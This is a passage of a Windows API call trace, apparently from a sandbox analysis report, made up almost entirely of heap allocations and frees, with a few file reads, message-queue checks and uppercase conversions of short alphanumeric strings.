(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0208.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0208.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0208.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0208.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e2020 [0208.390] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0208.390] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0xcc62, lpOverlapped=0x0) returned 1 [0208.392] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0208.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcc62) returned 0x2aae878 [0208.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e2020 | out: hHeap=0x2af0000) returned 1 [0208.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0208.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0208.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcc62) returned 0x2abb4e8 [0208.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcc62) returned 0x2aae878 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0208.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0208.398] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0208.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0208.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcc62) returned 0x2aae878 [0208.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730c8 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0208.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0208.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0208.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa840 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0208.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0208.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcc62) returned 0x2ac8158 [0208.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0208.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0208.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0208.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.406] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0208.406] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0208.406] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0208.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0208.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0208.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0208.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0208.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0208.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0208.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0208.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0208.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.410] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0208.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa50 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.410] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.410] 